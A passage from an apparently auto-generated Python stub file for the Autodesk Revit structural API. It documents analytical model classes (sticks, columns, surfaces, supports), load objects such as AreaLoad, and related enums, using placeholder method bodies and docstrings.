AnalyticalModelStick, selector: AnalyticalElementSelector, projectionY: StickElementProjectionY, projectionZ: StickElementProjectionZ) Sets the analytical model projection to a preset value. selector: End of the analytical model. projectionY: Preset value for Analytical Model Stick projection Y. projectionZ: Preset value for Analytical Model Stick projection Z. SetProjection(self: AnalyticalModelStick, selector: AnalyticalElementSelector, planeIdY: ElementId, planeIdZ: ElementId) Sets the analytical model projection to a preset value. selector: End of the analytical model. planeIdY: Plane on to which analytical model may be projected in Y direction. Plane identifies a Level, a Grid, or a Ref Plane. planeIdZ: Plane on to which analytical model may be projected in Z direction. Plane identifies a Level, a Grid, or a Ref Plane. SetProjection(self: AnalyticalModelStick, selector: AnalyticalElementSelector, projectionY: StickElementProjectionY, planeIdZ: ElementId) Sets the analytical model projection to a preset value. selector: End of the analytical model. projectionY: Preset value for Analytical Model Stick projection Y. planeIdZ: Plane on to which analytical model may be projected in Z direction. Plane identifies a Level, a Grid, or a Ref Plane. """ pass def SetReleases(self, start, fx, fy, fz, mx, my, mz): """ SetReleases(self: AnalyticalModelStick, start: bool, fx: bool, fy: bool, fz: bool, mx: bool, my: bool, mz: bool) Sets the releases of element. start: The position on analytical model stick element. True for start, false for end. """ pass def SetReleaseType(self, start, releaseType): """ SetReleaseType(self: AnalyticalModelStick, start: bool, releaseType: ReleaseType) Sets the release type. start: The position on analytical model stick element. True for start, false for end. releaseType: The type of release. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class AnalyticalModelColumn(AnalyticalModelStick, IDisposable): """ An element that represents the structural analytical model column. """ def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass BaseExtension = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The base extension option. Get: BaseExtension(self: AnalyticalModelColumn) -> StickElementExtension Set: BaseExtension(self: AnalyticalModelColumn) = value """ BaseExtensionMethod = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The bottom extension method option. Get: BaseExtensionMethod(self: AnalyticalModelColumn) -> AnalyticalAlignmentMethod Set: BaseExtensionMethod(self: AnalyticalModelColumn) = value """ BaseExtensionPlaneId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The bottom extension plane ID option. Get: BaseExtensionPlaneId(self: AnalyticalModelColumn) -> ElementId Set: BaseExtensionPlaneId(self: AnalyticalModelColumn) = value """ TopExtension = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The top extension option. Get: TopExtension(self: AnalyticalModelColumn) -> StickElementExtension Set: TopExtension(self: AnalyticalModelColumn) = value """ TopExtensionMethod = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The top extension method option. Get: TopExtensionMethod(self: AnalyticalModelColumn) -> AnalyticalAlignmentMethod Set: TopExtensionMethod(self: AnalyticalModelColumn) = value """ TopExtensionPlaneId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The top extension plane ID option. Get: TopExtensionPlaneId(self: AnalyticalModelColumn) -> ElementId Set: TopExtensionPlaneId(self: AnalyticalModelColumn) = value """ class AnalyticalModelSelector(object, IDisposable): """ Defines a portion of an Analytical Model for an Element. AnalyticalModelSelector(curve: Curve) AnalyticalModelSelector(curve: Curve, inCurveSelector: AnalyticalCurveSelector) AnalyticalModelSelector() AnalyticalModelSelector(inCurveSelector: AnalyticalCurveSelector) """ def Dispose(self): """ Dispose(self: AnalyticalModelSelector) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: AnalyticalModelSelector, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, *__args): """ __new__(cls: type, curve: Curve) __new__(cls: type, curve: Curve, inCurveSelector: AnalyticalCurveSelector) __new__(cls: type) __new__(cls: type, inCurveSelector: AnalyticalCurveSelector) """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass CurveSelector = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The portion of the curve to be selected. Get: CurveSelector(self: AnalyticalModelSelector) -> AnalyticalCurveSelector Set: CurveSelector(self: AnalyticalModelSelector) = value """ IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: AnalyticalModelSelector) -> bool """ class AnalyticalModelSketchComponent(object, IDisposable): """ This is one component of an AnalyticalModelSketch, which exists to provide greater granularity over the Analytical Model than at the Element level. """ def Dispose(self): """ Dispose(self: AnalyticalModelSketchComponent) """ pass def EnableAutoDetect(self): """ EnableAutoDetect(self: AnalyticalModelSketchComponent) Enables Auto-detect on Sketch Component. """ pass def GetAnalyticalAlignmentMethod(self): """ GetAnalyticalAlignmentMethod(self: AnalyticalModelSketchComponent) -> AnalyticalAlignmentMethod Retrieves Analytical Alignment Method preset for Sketch Component. Returns: Indicates whether Alignment Method is at Auto-Detect or Projection """ pass def GetAnalyticalProjectionDatumPlane(self): """ GetAnalyticalProjectionDatumPlane(self: AnalyticalModelSketchComponent) -> ElementId Retrieves Datum Plane ElementId for Analytical Projection Returns: Represents Datum used for Analytical Projection, if Analytical Projection Type indicates that a Datum Plane is to be used. Otherwise, invalidElementId is returned. """ pass def GetAnalyticalProjectionType(self): """ GetAnalyticalProjectionType(self: AnalyticalModelSketchComponent) -> AnalyticalProjectionType Retrieves Analytical Projection Type preset for Sketch Component. Returns: Indicates whether Analytical Projection is at a preset, or refers to a Datum. """ pass def GetAutoDetectMatchedElements(self): """ GetAutoDetectMatchedElements(self: AnalyticalModelSketchComponent) -> ICollection[ElementId] Retrieves ElementIds that Sketch Component is Auto-detecting against. Returns: Set of ElementIds that Sketch Component is auto-detecting against. """ pass def GetComponentElementId(self): """ GetComponentElementId(self: AnalyticalModelSketchComponent) -> ElementId Retrieves ElementId of Sketch Component, if such an operation makes sense. Returns: ElementId of Sketch Component. If the operation does not make sense (perhaps because the Sketch abstraction does not translate one-to-one to ElementIds), then this will return invalidElementId. """ pass def IsAutoDetectEnabled(self): """ IsAutoDetectEnabled(self: AnalyticalModelSketchComponent) -> bool Indicates whether Auto-detect is enabled on the given Sketch component. Returns: True if Auto-detect is enabled, false otherwise. """ pass def IsValidAnalyticalAlignmentMethod(self, alignmentMethod): """ IsValidAnalyticalAlignmentMethod(self: AnalyticalModelSketchComponent, alignmentMethod: AnalyticalAlignmentMethod) -> bool Indicates whether Analytical Alignment Method is valid for Sketch Component. alignmentMethod: Analytical Alignment Method preset to test for validity. Returns: True means alignment method is valid, false otherwise. """ pass def IsValidAnalyticalProjectionType(self, projectionType): """ IsValidAnalyticalProjectionType(self: AnalyticalModelSketchComponent, projectionType: AnalyticalProjectionType) -> bool Indicates whether Analytical Projection Type is valid for Sketch Component. projectionType: Analytical Projection Type preset to test for validity. Returns: True is projection type is valid, false otherwise. """ pass def IsValidDatumPlaneForProjection(self, datumPlaneId): """ IsValidDatumPlaneForProjection(self: AnalyticalModelSketchComponent, datumPlaneId: ElementId) -> bool Indicates whether Datum Plane is valid Analytical Projection of Sketch Component. datumPlaneId: ElementId identifying Datum Plane. Returns: True if Datum Plane is valid; false otherwise. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: AnalyticalModelSketchComponent, disposing: bool) """ pass def SetAnalyticalAlignmentMethod(self, alignmentMethod): """ SetAnalyticalAlignmentMethod(self: AnalyticalModelSketchComponent, alignmentMethod: AnalyticalAlignmentMethod) Sets the Alignment Method to the supplied Analytical Alignment Method alignmentMethod: Analytical Alignment Method which the Analytical Model should use for alignment. """ pass def SetAnalyticalProjectionDatumPlane(self, datumPlaneId): """ SetAnalyticalProjectionDatumPlane(self: AnalyticalModelSketchComponent, datumPlaneId: ElementId) Sets the Analytical Projection to supplied Datum Plane. datumPlaneId: Identifies Datum Plane ElementId. """ pass def SetAnalyticalProjectionType(self, projectionType): """ SetAnalyticalProjectionType(self: AnalyticalModelSketchComponent, projectionType: AnalyticalProjectionType) Sets the Analytical Projection to the supplied Analytical Projection Type. projectionType: Analytical Projection Type to which the Analytical Model should project. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: AnalyticalModelSketchComponent) -> bool """ class AnalyticalModelSupport(object, IDisposable): """ Represents one support for an Element, in the realm of the Analytical Model. """ def Dispose(self): """ Dispose(self: AnalyticalModelSupport) """ pass def GetCurve(self): """ GetCurve(self: AnalyticalModelSupport) -> Curve Retrieves the curve providing support. Returns: Represents the curve providing support, if the Support Type is Curve Support. """ pass def GetFace(self): """ GetFace(self: AnalyticalModelSupport) -> Face Retrieves surface providing support, Returns: Surface representing the surface providing support, if the Support Type is Surface Support. """ pass def GetPoint(self): """ GetPoint(self: AnalyticalModelSupport) -> XYZ Retrieves the point providing support. Returns: Represents the point providing support, if the Support Type is Point Support. """ pass def GetPriority(self): """ GetPriority(self: AnalyticalModelSupport) -> AnalyticalSupportPriority Retrieves the priority of the support provided. Returns: Indicates the support priority, as determined by Analytical Support Checking """ pass def GetSupportingElement(self): """ GetSupportingElement(self: AnalyticalModelSupport) -> ElementId Retrieves the actual Element Id providing support. Returns: Represents Element that provides support. """ pass def GetSupportType(self): """ GetSupportType(self: AnalyticalModelSupport) -> AnalyticalSupportType Gets the type of support provided. Returns: Indicates type of support provided. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: AnalyticalModelSupport, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: AnalyticalModelSupport) -> bool """ class AnalyticalModelSurface(AnalyticalModel, IDisposable): """ An element that represents a surface in the structural analytical model. """ def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetHiddenOpenings(self, openingsIds): """ GetHiddenOpenings(self: AnalyticalModelSurface) -> ICollection[ElementId] """ pass def GetLocalCoordinateSystem(self, point=None): """ GetLocalCoordinateSystem(self: AnalyticalModelSurface, point: XYZ) -> Transform Gets the local coordinate system (LCS) reflects analytical model orientation at the specified point. point: The point on the analytical model surface element. Returns: Transformation matrix. x - longitudinal axis, y - transversal, section - horizontal, strong axis, z - transversal, section - vertical, weak axis, origin - base point of LCS. """ pass def GetLoops(self, loopType): """ GetLoops(self: AnalyticalModelSurface, loopType: AnalyticalLoopType) -> IList[CurveLoop] Retrieves Analytical Model Loops with respect to the loopType. Returns: Loops that satisfy loopType criteria are returned. """ pass def GetOpeningLoops(self, openingId): """ GetOpeningLoops(self: AnalyticalModelSurface, openingId: ElementId) -> IList[CurveLoop] Retrieves Array of CurveLoops of Analytical Surface Opening.. Only valid openings for hide are allowed. openingId: Identifies which Opening creates the CurveLoop in the analytical surface. Returns: Array of CurveLoops associated with Opening. """ pass def GetOpenings(self, openingsIds): """ GetOpenings(self: AnalyticalModelSurface) -> ICollection[ElementId] """ pass def GetPlane(self): """ GetPlane(self: AnalyticalModelSurface) -> Plane Returns plane on which Analytical Model Surface Element is lying. Only planar surface elements are valid for this function. Returns: Plane object on which Analytical Model is projected. """ pass def HasOpenings(self): """ HasOpenings(self: AnalyticalModelSurface) -> bool Checks if the analytical model surface have any openings. Returns: True if Analytical Surface Element contains any openings (included invalid for hide). """ pass def HideOpening(self, openingId): """ HideOpening(self: AnalyticalModelSurface, openingId: ElementId) -> bool Hides set of curves originating from Opening. openingId: Opening to hide in analytical surface. Returns: True if given opening was hidden (operation was successful). """ pass def IsOpeningHidden(self, openingId): """ IsOpeningHidden(self: AnalyticalModelSurface, openingId: ElementId) -> bool Returns true if opening with given Identifier is hidden. openingId: Identifier of opening to check. Returns: True for openings which are hidden, false for all other Identifiers. """ pass def IsPlanar(self): """ IsPlanar(self: AnalyticalModelSurface) -> bool Indicates if the Analytical Model Surface Element is planar. Returns: True if Analytical Model Surface Element is planar, false otherwise. """ pass def IsValidOpeningForHide(self, openingId): """ IsValidOpeningForHide(self: AnalyticalModelSurface, openingId: ElementId) -> bool Returns true if opening with given Identifier could be hidden, false for all other Identifiers. openingId: Identifier of opening to check. Returns: True for openings which are valid to be hidden, false for all other Identifiers. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetLoops(self, loopType, newLoops): """ SetLoops(self: AnalyticalModelSurface, loopType: AnalyticalLoopType, newLoops: IList[CurveLoop]) -> bool """ pass def ShowOpening(self, openingId): """ ShowOpening(self: AnalyticalModelSurface, openingId: ElementId) -> bool Shows previously hidden set of curves originating from Opening. openingId: Opening to show in analytical surface. Returns: True if given opening was shown (operation was successful). """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass AlignmentMethod = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The alignment method option. Get: AlignmentMethod(self: AnalyticalModelSurface) -> AnalyticalAlignmentMethod Set: AlignmentMethod(self: AnalyticalModelSurface) = value """ BottomExtension = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The bottom extension option. Get: BottomExtension(self: AnalyticalModelSurface) -> SurfaceElementExtension Set: BottomExtension(self: AnalyticalModelSurface) = value """ BottomExtensionMethod = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The bottom extension method option. Get: BottomExtensionMethod(self: AnalyticalModelSurface) -> AnalyticalAlignmentMethod Set: BottomExtensionMethod(self: AnalyticalModelSurface) = value """ BottomExtensionPlaneId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The bottom extension plane ID option. Get: BottomExtensionPlaneId(self: AnalyticalModelSurface) -> ElementId Set: BottomExtensionPlaneId(self: AnalyticalModelSurface) = value """ HasExtension = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Indicates if the element supports an extension option. Get: HasExtension(self: AnalyticalModelSurface) -> bool """ ProjectionPlaneZ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The Z projection option. Get: ProjectionPlaneZ(self: AnalyticalModelSurface) -> ElementId Set: ProjectionPlaneZ(self: AnalyticalModelSurface) = value """ ProjectionZ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The Z projection option. Get: ProjectionZ(self: AnalyticalModelSurface) -> SurfaceElementProjectionZ Set: ProjectionZ(self: AnalyticalModelSurface) = value """ TopExtension = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The top extension option. Get: TopExtension(self: AnalyticalModelSurface) -> SurfaceElementExtension Set: TopExtension(self: AnalyticalModelSurface) = value """ TopExtensionMethod = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The top extension method option. Get: TopExtensionMethod(self: AnalyticalModelSurface) -> AnalyticalAlignmentMethod Set: TopExtensionMethod(self: AnalyticalModelSurface) = value """ TopExtensionPlaneId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The top extension plane ID option. Get: TopExtensionPlaneId(self: AnalyticalModelSurface) -> ElementId Set: TopExtensionPlaneId(self: AnalyticalModelSurface) = value """ class AnalyticalProjectionType(Enum, IComparable, IFormattable, IConvertible): """ Presets for given Analytical Projection. Combined with AnalyticalDirection, this abstracts Analytical Projections for all Structural Elements enum AnalyticalProjectionType, values: AutoDetect (5), Bottom (2), Center (1), CenterOfCore (11), DatumPlane (8), Default (10), Invalid (6), LocationLine (12), NotApplicable (9), SideOne (3), SideTwo (4), SketchCurve (7), Top (0), Varies (13) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass AutoDetect = None Bottom = None Center = None CenterOfCore = None DatumPlane = None Default = None Invalid = None LocationLine = None NotApplicable = None SideOne = None SideTwo = None SketchCurve = None Top = None value__ = None Varies = None class AnalyticalRigidLinksOption(Enum, IComparable, IFormattable, IConvertible): """ Specifies how Rigid Links will be made for the Analytical Model. enum AnalyticalRigidLinksOption, values: Disabled (1), Enabled (0), FromColumn (2) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Disabled = None Enabled = None FromColumn = None value__ = None class AnalyticalSupportChecking(object): """ Utilities that allow for detection of incorrect or incomplete analytical supports. """ @staticmethod def CheckMemberSupports(document, progressIndicatorText): """ CheckMemberSupports(document: Document, progressIndicatorText: str) -> bool Check if the document contains unsupported Structural Elements. document: Document in which to perform Analytical Support Check. progressIndicatorText: Text to display on progress indicator. Returns: True if the support check succeeded, false otherwise. """ pass __all__ = [ 'CheckMemberSupports', ] class AnalyticalSupportPriority(Enum, IComparable, IFormattable, IConvertible): """ Defines how "highly" another Element is giving support for one Element. enum AnalyticalSupportPriority, values: FourthHigestPriority (4), HighestPriority (1), SecondHighestPriority (2), ThirdHighestPriority (3), UnknownPriority (0) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass FourthHigestPriority = None HighestPriority = None SecondHighestPriority = None ThirdHighestPriority = None UnknownPriority = None value__ = None class AnalyticalSupportType(Enum, IComparable, IFormattable, IConvertible): """ Indicates what kind of support another Element provides -- Point, Surface, or Curve. enum AnalyticalSupportType, values: CurveSupport (2), PointSupport (1), SurfaceSupport (3), UnknownSupport (0) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass CurveSupport = None PointSupport = None SurfaceSupport = None UnknownSupport = None value__ = None class AnalyzeAs(Enum, IComparable, IFormattable, IConvertible): """ Analyze As has various functions within the Analytical Model, and is Element-dependent. "Not for Analysis" usually means that there will not be an Analytical Model generated. The others indicate how the Analytical Model behavior will treat the Element in question. For instance "Hanger" columns have different support expectations than "Gravity" columns. enum AnalyzeAs, values: Gravity (1), GravityLateral (10), Hanger (0), Lateral (2), Mat (4), NotApplicable (8), NotForAnalysis (7), SlabOneWay (3), SlabOnGrade (5), SlabTwoWay (9) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Gravity = None GravityLateral = None Hanger = None Lateral = None Mat = None NotApplicable = None NotForAnalysis = None SlabOneWay = None SlabOnGrade = None SlabTwoWay = None value__ = None class LoadBase(Element, IDisposable): """ The LoadBase object is the base class for all load objects within the Autodesk Revit API. """ def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def IsOrientToPermitted(self, orientTo): """ IsOrientToPermitted(self: LoadBase, orientTo: LoadOrientTo) -> bool Indicates if the provided orientation is permitted for this load. orientTo: Load orientation to check. Returns: True if provided orientation type is permitted for this load, false if not. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass HostElement = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The host element for the load. Get: HostElement(self: LoadBase) -> AnalyticalModel """ HostElementId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The host element ID for the load. Get: HostElementId(self: LoadBase) -> ElementId """ IsHosted = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Indicates if the Load is hosted or non-hosted. Get: IsHosted(self: LoadBase) -> bool """ IsReaction = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The load is reaction option. Get: IsReaction(self: LoadBase) -> bool Set: IsReaction(self: LoadBase) = value """ LoadCase = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The load case for the load. Get: LoadCase(self: LoadBase) -> LoadCase """ LoadCaseId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The load case ID for the load. Get: LoadCaseId(self: LoadBase) -> ElementId Set: LoadCaseId(self: LoadBase) = value """ LoadCaseName = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The name of the load case to which this load belongs. Get: LoadCaseName(self: LoadBase) -> str """ LoadCategoryName = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The name of the category to which this load belongs. Get: LoadCategoryName(self: LoadBase) -> str """ LoadNatureName = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """A string representing the nature of the load. Get: LoadNatureName(self: LoadBase) -> str """ OrientTo = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The load orientation option. Get: OrientTo(self: LoadBase) -> LoadOrientTo Set: OrientTo(self: LoadBase) = value """ WorkPlaneId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Id of the work plane which may determine the orientation of the load. Get: WorkPlaneId(self: LoadBase) -> ElementId """ class AreaLoad(LoadBase, IDisposable): """ An object that represents a force applied across an area. """ @staticmethod def Create(aDoc, *__args): """ Create(aDoc: Document, host: AnalyticalModelSurface, forceVector: XYZ, symbol: AreaLoadType) -> AreaLoad Creates a new hosted area load within the project. aDoc: Document to which new area load will be added. host: The analytical surface host element (Analytical Floor, Analytical Foundation Slab or Analytical Wall) for the area Load. forceVector: The force vector applied to the 1st reference point of the area load. symbol: The symbol of the AreaLoad. Set ll to use default type. Returns: If successful, returns an object of the newly created AreaLoad. ll is returned if the operation fails. Create(aDoc: Document, loops: IList[CurveLoop], forceVector: XYZ, symbol: AreaLoadType) -> AreaLoad Create(aDoc: Document, loops: IList[CurveLoop], forceVectors: IList[XYZ], refPointCurveIndexes: IList[int], refPointCurveSelectors: IList[int], symbol: AreaLoadType) -> AreaLoad """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetLoops(self): """ GetLoops(self: AreaLoad) -> IList[CurveLoop] Returns curve loops that define geometry of the area load. """ pass def GetRefPoint(self, index): """ GetRefPoint(self: AreaLoad, index: int) -> XYZ Returns the physical location of the reference point. index: The index of the point to return. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetLoops(self, doc, newLoops): """ SetLoops(self: AreaLoad, doc: Document, newLoops: IList[CurveLoop]) -> bool """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass Area = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Returns area of the area load. Get: Area(self: AreaLoad) -> float """ ForceVector1 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The force vector applied to the 1st reference point of the area load, oriented according to OrientTo setting. Get: ForceVector1(self: AreaLoad) -> XYZ Set: ForceVector1(self: AreaLoad) = value """ ForceVector2 = property(lambda 